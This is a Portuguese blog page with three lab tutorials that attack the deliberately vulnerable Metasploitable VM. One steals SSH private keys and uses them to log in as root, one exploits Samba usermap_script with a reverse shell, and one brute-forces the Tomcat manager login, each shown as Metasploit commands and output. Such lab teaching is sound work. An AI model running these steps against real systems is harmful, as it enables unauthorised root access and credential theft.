Mostrando postagens com marcador metasploitable. Mostrar todas as postagens
Mostrando postagens com marcador metasploitable. Mostrar todas as postagens

sábado, 18 de maio de 2013

Exploitando o Metasploitable: Acessando por SSH sem ter a senha

sábado, maio 18, 2013 por Unknown No comments
E ai galera!

Já tinha me esquecido dos posts do Metasploitable, mas vou voltar a postar por que um dos posts que eu pretendo fazer é como fazer uma auditoria de vulnerabilidades completa e relatório, e para isso estou auditando esta VM. O interessante desse post é que eu procurei em tudo que foi lugar sobre esse módulo que eu usei e não encontrei nada. No próprio site do Metasploit não tem muitas informações sobre ele, então temos mais um conteúdo exclusivo da Brutal Security :D

Acredito que isto não seja de fato uma falha, por que para usar esse módulo eu já preciso ter uma sessão do metasploit aberta com o alvo, mas também não é um módulo totalmente inútil. Vamos a ele então!

Basicamente existem vários métodos de se conectar com um computador remotamente, por SSH podemos usar o tradicional usuário e senha, ou também podemos utilizar um sistema de chaves. Essas chaves são arquivos que ficam no servidor e no cliente e quando é solicitado a conexão as chaves são comparadas para autenticar o usuário e liberar o acesso remoto a máquina. Não vou muito a fundo na questão de chaves por que isso é um conteúdo da LPI e provavelmente vai ter um post sobre isso.

Este módulo funciona da seguinte maneira: já com uma sessão aberta rodamos o módulo e roubamos estas chaves, depois disso colocamos tudo nos devidos lugares e podemos conectar por SSH a qualquer momento sem saber a senha.

Vamos lá então! Primeiramente precisamos de uma sessão aberta com o alvo, não vou explicar isso aqui, se estiver usando o Metasploitable tem milhares de furos que você pode usar para chegar nisso então se vire. :)

Já tenho aqui o Metasploit rodando com uma sessão aberta:

[*] The port used by the backdoor bind listener is already open
[+] UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (10.0.0.5:33290 -> 10.0.0.6:6200) at 2013-04-08 00:32:12 -0300

Agora vamos colocar isso em background com o atalho CTRL + Z e vamos carregar o módulo:
msf > search openssh
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/local/trusted_service_path 2001-10-25 00:00:00 UTC excellent Windows Service Trusted Path Privilege Escalation
post/multi/gather/ssh_creds normal Multi Gather OpenSSH PKI Credentials Collection
msf > use post/multi/gather/ssh_creds
Este módulo tem apenas um parâmetro, o SESSION, onde você vai informar de qual sessão do Metasploit você quer que ele pegue as credenciais.
msf post(ssh_creds) > set SESSION 1
SESSION => 1
msf post(ssh_creds) > exploit
[*] Finding .ssh directories
[*] Looting 3 directories
[+] Downloaded /home/msfadmin/.ssh/authorized_keys -> /root/.msf4/loot/20130408003303_default_10.0.0.6_ssh.authorized_k_435099.txt
[+] Downloaded /home/msfadmin/.ssh/id_rsa -> /root/.msf4/loot/20130408003304_default_10.0.0.6_ssh.id_rsa_734052.txt
[*] Saving private key id_rsa as cred
[+] Downloaded /home/msfadmin/.ssh/id_rsa.pub -> /root/.msf4/loot/20130408003304_default_10.0.0.6_ssh.id_rsa.pub_477962.txt
[+] Downloaded /home/user/.ssh/id_dsa -> /root/.msf4/loot/20130408003305_default_10.0.0.6_ssh.id_dsa_894228.txt
[*] Saving private key id_dsa as cred
[+] Downloaded /home/user/.ssh/id_dsa.pub -> /root/.msf4/loot/20130408003305_default_10.0.0.6_ssh.id_dsa.pub_587787.txt
[+] Downloaded /root/.ssh/authorized_keys -> /root/.msf4/loot/20130408003306_default_10.0.0.6_ssh.authorized_k_892925.txt
[+] Downloaded /root/.ssh/known_hosts -> /root/.msf4/loot/20130408003306_default_10.0.0.6_ssh.known_hosts_898232.txt
[*] Post module execution completed
msf post(ssh_creds) > exit -y

Como você pode ver, conseguimos alguns arquivos do alvo, mas eles estão na pasta errada e com um nome todo maluco. O que precisamos fazer agora é corrigir o nome e colocar na pasta certa que é a/root/.ssh do seu Backtrack ou qualquer outra distro que você use. Os nomes dos arquivos corretos estão na própria saída do comando, destaquei em negrito no exemplo acima. As chaves do diretório home você poderia ignorar, mas para garantir que de certo eu passei tudo. Então vamos trocar os nomes e mandar para o lugar certo:

root@bt:~# cd /root/.msf4/loot
root@bt:~/.msf4/loot# ls
20130408003303_default_10.0.0.6_ssh.authorized_k_435099.txt
20130408003304_default_10.0.0.6_ssh.id_rsa_734052.txt
20130408003304_default_10.0.0.6_ssh.id_rsa.pub_477962.txt
20130408003305_default_10.0.0.6_ssh.id_dsa_894228.txt
20130408003305_default_10.0.0.6_ssh.id_dsa.pub_587787.txt
20130408003306_default_10.0.0.6_ssh.authorized_k_892925.txt
20130408003306_default_10.0.0.6_ssh.known_hosts_898232.txt
root@bt:~/.msf4/loot# mv 20130408003303_default_10.0.0.6_ssh.authorized_k_435099.txt /root/.ssh/authorized_keys
root@bt:~/.msf4/loot# mv 20130408003304_default_10.0.0.6_ssh.id_rsa_734052.txt /root/.ssh/id_rsa
root@bt:~/.msf4/loot# mv 20130408003304_default_10.0.0.6_ssh.id_rsa.pub_477962.txt /root/.ssh/id_rsa.pub
root@bt:~/.msf4/loot# mv 20130408003305_default_10.0.0.6_ssh.id_dsa_894228.txt /root/.ssh/id_dsa
root@bt:~/.msf4/loot# mv 20130408003305_default_10.0.0.6_ssh.id_dsa.pub_587787.txt /root/.ssh/id_dsa.pub
root@bt:~/.msf4/loot# mv 20130408003306_default_10.0.0.6_ssh.authorized_k_892925.txt /root/.ssh/authorized_keys
root@bt:~/.msf4/loot# mv 20130408003306_default_10.0.0.6_ssh.known_hosts_898232.txt /root/.ssh/known_hosts

Agora que está tudo lá é só acessar por SSH! Se você substituiu tudo corretamente vai ter acesso root por SSH ao alvo:

root@bt:~/.msf4/loot# ssh root@10.0.0.6
The authenticity of host '10.0.0.6 (10.0.0.6)' can't be established.
RSA key fingerprint is 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.0.0.6' (RSA) to the list of known hosts.
Last login: Sun Apr 7 23:26:44 2013 from 10.0.0.5
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
You have mail.
root@metasploitable:~# w
23:36:07 up 1:12, 2 users, load average: 0.01, 0.02, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root pts/0 :0.0 22:24 1:12 0.01s 0.01s -bash
root pts/1 10.0.0.5 23:36 0.00s 0.01s 0.00s w
root@metasploitable:~# uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
root@metasploitable:~# exit
logout
Connection to 10.0.0.6 closed.

E era isso! Agora é com você, acessar por SSH na minha opinião gera menos ruído e é mais simples do que manter uma sessão do Metasploit sempre aberta, seja ela com Backdoor ou com alguma outra coisa.

A solução para esse problema com chaves é manter seu sistema sempre atualizado para evitar que outra falha seja explorada como eu fiz neste tutorial, utilizar uma senha forte ou mudar frequentemente suas chaves de acesso.

Eu fico por aqui, bons estudos!
Read More

terça-feira, 14 de maio de 2013

Exploitando o Metasploitable [2]

terça-feira, maio 14, 2013 por Unknown No comments
Oi de novo!

Vamos a mais um post da nossa série “Exploitando o Metasploitable”. Neste post vamos explorar uma vulnerabilidade no Samba e com ela conseguir acesso Root ao sistema.





O que vamos precisar?


  • Vítima rodando uma versão vulnerável do Samba
  • Distro de Pentest com o Framework Metasploit
  • Nmap ou outro portscanner


Localizando o alvo


Antes de mais nada vamos achar onde na rede que está a vítima. Para isso vamos usar o nmap:


attacker@blackoutlabs:~# nmap -sV 192.168.0.1/24

Um dos resultados deve ser como o seguinte:


Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-09-11 19:18 BRT
Nmap scan report for 192.168.0.100
Host is up (0.0014s latency).
Not shown: 988 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.1
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch)
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
5432/tcp open postgresql PostgreSQL DB 8.3.0 – 8.3.7
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
MAC Address: 08:00:27:45:2C:E8 (Cadmus Computer Systems)
Service Info: Host: metasploitable.localdomain; OSs: Unix, Linux; CPE: cpe:/o:linux:kernel

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.87 seconds

Podemos notar (onde está em vermelho) o Samba rodando na porta 139 e na 445. Sim, as mesmas portas do famoso ms08_067_netapi, que explora uma vulnerabilidade no mesmo serviço, mas apenas no windows xp (ouvi boatos de pessoas que tiveram sucesso no win Vista/7).


Explorando


Com o IP na mão vamos vamos iniciar o metasploit e procurar por nosso exploit.


attacker@blackoutlabs:~# msfconsole

+——————————————————-+
| METASPLOIT by Rapid7 |
+—————————+—————————+
| __________________ | |
| ==c(______(o(______(_() | |”"”"”"”"”"”"|======[*** |
| )=\ | | EXPLOIT \ |
| // \\ | |_____________\_______ |
| // \\ | |==[msf >]============\ |
| // \\ | |______________________\ |
| // RECON \\ | \(@)(@)(@)(@)(@)(@)(@)/ |
| // \\ | ********************* |
+—————————+—————————+
| o O o | \’\/\/\/’/ |
| o O | )======( |
| o | .’ LOOT ‘. |
| |^^^^^^^^^^^^^^|l___ | / _||__ \ |
| | PAYLOAD |”"\___, | / (_||_ \ |
| |________________|__|)__| | | __||_) | |
| |(@)(@)”"”**|(@)(@)**|(@) | ” || ” |
| = = = = = = = = = = = = | ‘————–’ |
+—————————+—————————+
=[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ — –=[ 938 exploits - 501 auxiliary - 151 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops

msf > search samba

Matching Modules
================

Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/admin/smb/samba_symlink_traversal normal Samba Symlink Directory Traversal
auxiliary/dos/samba/lsa_addprivs_heap normal Samba lsa_io_privilege_set Heap Overflow
auxiliary/dos/samba/lsa_transnames_heap normal Samba lsa_io_trans_names Heap Overflow
exploit/freebsd/samba/trans2open 2003-04-07 00:00:00 UTC great Samba trans2open Overflow (*BSD x86)
exploit/linux/samba/chain_reply 2010-06-16 00:00:00 UTC good Samba chain_reply Memory Corruption (Linux x86)
exploit/linux/samba/lsa_transnames_heap 2007-05-14 00:00:00 UTC good Samba lsa_io_trans_names Heap Overflow
exploit/linux/samba/trans2open 2003-04-07 00:00:00 UTC great Samba trans2open Overflow (Linux x86)
exploit/multi/samba/nttrans 2003-04-07 00:00:00 UTC average Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow
exploit/multi/samba/usermap_script 2007-05-14 00:00:00 UTC excellent Samba "username map script" Command Execution
exploit/osx/samba/lsa_transnames_heap 2007-05-14 00:00:00 UTC average Samba lsa_io_trans_names Heap Overflow
exploit/osx/samba/trans2open 2003-04-07 00:00:00 UTC great Samba trans2open Overflow (Mac OS X PPC)
exploit/solaris/samba/lsa_transnames_heap 2007-05-14 00:00:00 UTC average Samba lsa_io_trans_names Heap Overflow
exploit/solaris/samba/trans2open 2003-04-07 00:00:00 UTC great Samba trans2open Overflow (Solaris SPARC)
exploit/unix/webapp/citrix_access_gateway_exec 2010-12-21 00:00:00 UTC excellent Citrix Access Gateway Command Execution
exploit/windows/http/sambar6_search_results 2003-06-21 00:00:00 UTC normal Sambar 6 Search Results Buffer Overflow
exploit/windows/license/calicclnt_getconfig 2005-03-02 00:00:00 UTC average Computer Associates License Client GETCONFIG Overflow
post/linux/gather/enum_configs normal Linux Gather Configurations

Novamente, vamos usar o que está destacado em vermelho e vamos ver suas opções:


msf > use exploit/multi/samba/usermap_script
msf exploit(usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 139 yes The target port
Exploit target:

Id Name
-- ----
0 Automatic
Pode-se perceber que o exploit é extremamente simples, precisamos apenas informar o IP e a porta da vítima e do atacante(payload, mais adiante). Vamos preencher essas informações e rodar o exploit para ver o que acontece...


msf exploit(usermap_script) > set RHOST 192.168.0.100
RHOST => 192.168.0.100

msf exploit(usermap_script) > set RPORT 445
RPORT => 445

msf exploit(usermap_script) > show payloads

Compatible Payloads
===================

Name Disclosure Date Rank Description
---- --------------- ---- -----------
cmd/unix/bind_inetd normal Unix Command Shell, Bind TCP (inetd)
cmd/unix/bind_netcat normal Unix Command Shell, Bind TCP (via netcat -e)
cmd/unix/bind_netcat_ipv6 normal Unix Command Shell, Bind TCP (via netcat -e) IPv6
cmd/unix/bind_perl normal Unix Command Shell, Bind TCP (via Perl)
cmd/unix/bind_perl_ipv6 normal Unix Command Shell, Bind TCP (via perl) IPv6
cmd/unix/bind_ruby normal Unix Command Shell, Bind TCP (via Ruby)
cmd/unix/bind_ruby_ipv6 normal Unix Command Shell, Bind TCP (via Ruby) IPv6
cmd/unix/generic normal Unix Command, Generic Command Execution
cmd/unix/reverse normal Unix Command Shell, Double reverse TCP (telnet)
cmd/unix/reverse_netcat normal Unix Command Shell, Reverse TCP (via netcat -e)
cmd/unix/reverse_perl normal Unix Command Shell, Reverse TCP (via Perl)
cmd/unix/reverse_python normal Unix Command Shell, Reverse TCP (via Python)
cmd/unix/reverse_ruby normal Unix Command Shell, Reverse TCP (via Ruby)

msf exploit(usermap_script) > set PAYLOAD cmd/unix/reverse
PAYLOAD => cmd/unix/reverse

msf exploit(usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.0.100 yes The target address
RPORT 445 yes The target port
Payload options (cmd/unix/reverse):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:

Id Name
-- ----
0 Automatic
msf exploit(usermap_script) > set LHOST 192.168.0.106
LHOST => 192.168.0.106
msf exploit(usermap_script) > exploit

[*] Started reverse double handler
[*] Accepted the first client connection…
[*] Accepted the second client connection…
[*] Command: echo Y9MlnoVTPC9oq8TG;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets…
[*] Reading from socket B
[*] B: “Y9MlnoVTPC9oq8TG\r\n”
[*] Matching…
[*] A is input…
[*] Command shell session 1 opened (192.168.0.106:4444 -> 192.168.0.100:51565) at 2012-09-11 19:20:41 -0300

ifconfig
eth0 Link encap:Ethernet HWaddr 08:00:27:45:2c:e8
inet addr:192.168.0.100 Bcast:192.168.0.255 Mask:255.255.255.0
inet6 addr: fe80::a00:27ff:fe45:2ce8/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:3127 errors:0 dropped:0 overruns:0 frame:0
TX packets:2306 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:216601 (211.5 KB) TX bytes:154677 (151.0 KB)
Interrupt:16 Base address:0xd020

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:94 errors:0 dropped:0 overruns:0 frame:0
TX packets:94 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:47217 (46.1 KB) TX bytes:47217 (46.1 KB)

uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

id
uid=0(root) gid=0(root)

whoami
root

OWNED!!!
sh: OWNED!!!: not found

E ai está. Rodei alguns comandos para confirmar que estava na máquina e para ter certeza que estava como root.


Evitando o Ataque

Read More

Exploitando o Metasploitable

terça-feira, maio 14, 2013 por Unknown No comments
Olá pessoal!

Vou começar aqui uma série de tutoriais, ensinando a exploitar algumas falhas mais comuns, para o pessoal que está começando. Se você seguiu o post de como montar um lab, provavelmente você tem uma distro Linux chamada Metasploitable.

Vamos usar as falhas dela nessa série. A vulnerabilidade de hoje está no Apache Tomcat 5.5.



Antes de sairmos exploitando tudo primeiro vamos saber o que estamos atacando.

O Apache Tomcat é um projeto colaborativo open source, feito em java, e sua função é ser um server web java. Essa vulnerabilidade que vamos explorar aqui pode ser encontrada em algumas versões, entre elas a 5.5 que está rodando no Metasploitable.


O que vamos precisar?


  • Vitima rodando uma versão vulnerável do Apache Tomcat
  • Distro de pentest com o Framework Metasploit
  • Uma boa wordlist
  • nmap ou qualquer outro port scanner


Localizando o alvo


Antes de sair exploitando tudo o que ver pela frente vamos fazer um rápido reconhecimento do terreno. Para encontrar o server vamos usar o nmap. Primeiramente vamos fazer um ping scan para ver quantos hosts estão na rede.


attacker@blackoutlabs:~# nmap -sP 192.168.0.1/24

Starting Nmap 6.01 ( http://nmap.org ) at 2012-08-24 20:06 BRT
Nmap scan report for 192.168.0.1
Host is up (0.0028s latency).
MAC Address: 00:1E:58:C2:96:0B (D-Link)
Nmap scan report for 192.168.0.100
Host is up (0.065s latency).
MAC Address: D8:A2:5E:8D:BA:AF (Apple)
Nmap scan report for 192.168.0.101
Host is up (0.066s latency).
MAC Address: 1C:4B:D6:4F:C7:3D (AzureWave)
Nmap scan report for 192.168.0.104
Host is up (0.15s latency).
MAC Address: 0C:74:C2:BA:CE:51 (Apple)
Nmap scan report for 192.168.0.105
Host is up (0.071s latency).
MAC Address: A4:D1:D2:0C:EF:F5 (Apple)
Nmap scan report for 192.168.0.106
Host is up.
Nmap scan report for 192.168.0.107
Host is up (0.00050s latency).
MAC Address: C8:9C:DC:44:FC:6A (Elitegroup Computer System CO.)
Nmap scan report for 192.168.0.108
Host is up (0.00048s latency).
MAC Address: 08:00:27:45:2C:E8 (Cadmus Computer Systems)
Nmap scan report for 192.168.0.109
Host is up (0.055s latency).
MAC Address: E8:11:32:AD:57:9D (Samsung Electronics Co.)
Nmap done: 256 IP addresses (9 hosts up) scanned in 4.68 seconds

Opa bastante pcs, lab todo ligado

E agora? Qual será o nosso alvo?

Novamente com o nmap vamos escanear os ips até encontrar nosso alvo


attacker@blackoutlabs:~# nmap -A 192.168.0.108

Starting Nmap 6.01 ( http://nmap.org ) at 2012-08-24 20:05 BRT
Nmap scan report for 192.168.0.108
Host is up (0.00062s latency).
Not shown: 988 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.1
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2010-03-17 14:07:45
|_Not valid after: 2010-04-16 14:07:45
53/tcp open domain ISC BIND 9.4.2
| dns-nsid:
|_ bind.version: 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch)
|_http-title: Site doesn’t have a title (text/html).
| http-methods: Potentially risky methods: TRACE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
5432/tcp open postgresql PostgreSQL DB 8.3.0 – 8.3.7
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Apache Tomcat/5.5
|_http-favicon: Apache Tomcat
MAC Address: 08:00:27:45:2C:E8 (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:kernel:2.6
OS details: Linux 2.6.9 – 2.6.31
Network Distance: 1 hop
Service Info: Host: metasploitable.localdomain; OSs: Unix, Linux; CPE: cpe:/o:linux:kernel

Host script results:
|_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| NetBIOS computer name:
| Workgroup: WORKGROUP
|_ System time: 2012-08-24 20:06:02 UTC-4

TRACEROUTE
HOP RTT ADDRESS
1 0.62 ms 192.168.0.108

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.20 seconds

Opa parece que achamos! Não foi de primeira, levei um tempinho para achar ele ali hehe…

Agora temos algumas informações interessantes. Temos o Apache Tomcat 5.5 rodando na porta 8180 (lembre-se disso). Pronto! Já sabemos onde ele está agora vamos brincar com ele um pouco.


Explorando


Para explorar-mos esse serviço vamos usar o Framework Metasploit e procurar algum exploit para o tomcat.


attacker@blackoutlabs:~# msfconsole
_ _
/ \ / \ __ _ __ /_/ __
| |\ / | _____ \ \ ___ _____ | | / \ _ \ \
| | \/| | | ___\ |- -| /\ / __\ | -__/ | | | | || | |- -|
|_| | | | _|__ | |_ / -\ __\ \ | | | |_ \__/ | | | |_
|/ |____/ \___\/ /\ \___/ \/ \__| |_\ \___\


+ — – =[metasploit v4.5.0-dev [core:4.5 api:1.0]
+ — – =[ 927 exploits - 499 auxiliary - 151 post]
+ — – =[ 251 payloads - 28 encoders - 8 nops]

msf> search tomcat
Matching Modules
================

Name Disclosure Date Rank Description
—- ————— —- ———–
auxiliary/admin/http/tomcat_administration normal Tomcat Administration Tool Default Access
auxiliary/admin/http/tomcat_utf8_traversal normal Tomcat UTF-8 Directory Traversal Vulnerability
auxiliary/admin/http/trendmicro_dlp_traversal normal TrendMicro Data Loss Prevention 5.5 Directory Traversal
auxiliary/dos/http/apache_tomcat_transfer_encoding 2010-07-09 00:00:00 UTC normal Apache Tomcat Transfer-Encoding Information Disclosure and DoS
auxiliary/dos/http/hashcollision_dos 2011-12-28 00:00:00 UTC normal Hashtable Collisions
auxiliary/scanner/http/tomcat_enum normal Apache Tomcat User Enumeration
auxiliary/scanner/http/tomcat_mgr_login normal Tomcat Application Manager Login Utility
exploit/multi/http/tomcat_mgr_deploy 2009-11-09 00:00:00 UTC excellent Apache Tomcat Manager Application Deployer Authenticated Code Execution

Opa temos alguns exploits interessantes. Vamos usar o tomcat_mgr_login para fazer um bruteforce. Antes de invadir precisamos de um user/pass válido.


msf> use auxiliary/scanner/http/tomcat_mgr_login
msf (tomcat_mgr_login)> show options

Module options (auxiliary/scanner/http/tomcat_mgr_login):

Name Current Setting Required Description
—- ————— ——– ———–
BLANK_PASSWORDS true no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
PASSWORD no A specific password to authenticate with
PASS_FILE /opt/metasploit/msf3/data/wordlists/tomcat_mgr_default_pass.txt no File containing passwords, one per line
Proxies no Use a proxy chain
RHOSTS yes The target address range or CIDR identifier
RPORT 8080 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads
URI /manager/html yes URI for Manager login. Default is /manager/html
USERNAME no A specific username to authenticate as
USERPASS_FILE /opt/metasploit/msf3/data/wordlists/tomcat_mgr_default_userpass.txt no File containing users and passwords separated by space, one pair per line
USER_AS_PASS true no Try the username as the password for all users
USER_FILE /opt/metasploit/msf3/data/wordlists/tomcat_mgr_default_users.txt no File containing users, one per line
VERBOSE true yes Whether to print output for all attempts
VHOST no HTTP server virtual host

Bom, esse exploit precisa de bastante coisas. Vamos acrescentar o host que encontramos antes, a porta (lembra qual era? Sempre preste atenção nisso), caso ele não encontre com os usuarios e senhas padrão vamos acrescentar nossas wordlists em PASS_FILE e USER_FILE e caso ele não encontre no diretório padrão precisaremos mudar isso também em URI.


msf (tomcat_mgr_login) > set BLANK_PASSWORDS false
BLANK_PASSWORDS => false
msf (tomcat_mgr_login) > set RHOSTS 192.168.0.108
RHOSTS => 192.168.0.108
msf (tomcat_mgr_login) > set RPORT 8180
RPORT => 8180
msf (tomcat_mgr_login) > exploit

[*][192.168.0.108:8180 TOMCAT_MGR - [01/45] – Trying username:’admin’ with password:’admin’
[-][192.168.0.108:8180 TOMCAT_MGR - [01/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘admin’
[*][192.168.0.108:8180 TOMCAT_MGR - [02/45] – Trying username:’manager’ with password:’manager’
[-][192.168.0.108:8180 TOMCAT_MGR - [02/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘manager’
[*][192.168.0.108:8180 TOMCAT_MGR - [03/45] – Trying username:’role1′ with password:’role1′
[-][192.168.0.108:8180 TOMCAT_MGR - [03/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘role1′
[*][192.168.0.108:8180 TOMCAT_MGR - [04/45] – Trying username:’root’ with password:’root’
[-][192.168.0.108:8180 TOMCAT_MGR - [04/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘root’
[*][192.168.0.108:8180 TOMCAT_MGR - [05/45] – Trying username:’tomcat’ with password:’tomcat’
[+][http://192.168.0.108:8180/manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] successful login ‘tomcat’ : ‘tomcat’
[*][192.168.0.108:8180 TOMCAT_MGR - [06/45] – Trying username:’both’ with password:’both’
[-][192.168.0.108:8180 TOMCAT_MGR - [06/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘both’
[*][192.168.0.108:8180 TOMCAT_MGR - [07/45] – Trying username:’j2deployer’ with password:’j2deployer’
[-][192.168.0.108:8180 TOMCAT_MGR - [07/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘j2deployer’
[*][192.168.0.108:8180 TOMCAT_MGR - [08/45] – Trying username:’ovwebusr’ with password:’ovwebusr’
[-][192.168.0.108:8180 TOMCAT_MGR - [08/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘ovwebusr’
[*][192.168.0.108:8180 TOMCAT_MGR - [09/45] – Trying username:’cxsdk’ with password:’cxsdk’
[-][192.168.0.108:8180 TOMCAT_MGR - [09/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘cxsdk’
[*][192.168.0.108:8180 TOMCAT_MGR - [10/45] – Trying username:’ADMIN’ with password:’ADMIN’
[-][192.168.0.108:8180 TOMCAT_MGR - [10/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘ADMIN’
[*][192.168.0.108:8180 TOMCAT_MGR - [11/45] – Trying username:’xampp’ with password:’xampp’
[-][192.168.0.108:8180 TOMCAT_MGR - [11/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘xampp’
[*][192.168.0.108:8180 TOMCAT_MGR - [12/45] – Trying username:’ovwebusr’ with password:’OvW*busr1′
[-][192.168.0.108:8180 TOMCAT_MGR - [12/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘ovwebusr’
[*][192.168.0.108:8180 TOMCAT_MGR - [13/45] – Trying username:’cxsdk’ with password:’kdsxc’
[-][192.168.0.108:8180 TOMCAT_MGR - [13/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘cxsdk’
[*][192.168.0.108:8180 TOMCAT_MGR - [14/45] – Trying username:’root’ with password:’owaspbwa’
[-][192.168.0.108:8180 TOMCAT_MGR - [14/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘root’
[*][192.168.0.108:8180 TOMCAT_MGR - [15/45] – Trying username:’admin’ with password:’manager’
[-][192.168.0.108:8180 TOMCAT_MGR - [15/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘admin’
[*][192.168.0.108:8180 TOMCAT_MGR - [16/45] – Trying username:’admin’ with password:’role1′
[-][192.168.0.108:8180 TOMCAT_MGR - [16/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘admin’
[*][192.168.0.108:8180 TOMCAT_MGR - [17/45] – Trying username:’admin’ with password:’root’
[-][192.168.0.108:8180 TOMCAT_MGR - [17/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘admin’
[*][192.168.0.108:8180 TOMCAT_MGR - [18/45] – Trying username:’admin’ with password:’tomcat’
[-][192.168.0.108:8180 TOMCAT_MGR - [18/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘admin’
[*][192.168.0.108:8180 TOMCAT_MGR - [19/45] – Trying username:’admin’ with password:’s3cret’
[-][192.168.0.108:8180 TOMCAT_MGR - [19/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘admin’
[*][192.168.0.108:8180 TOMCAT_MGR - [20/45] – Trying username:’manager’ with password:’admin’
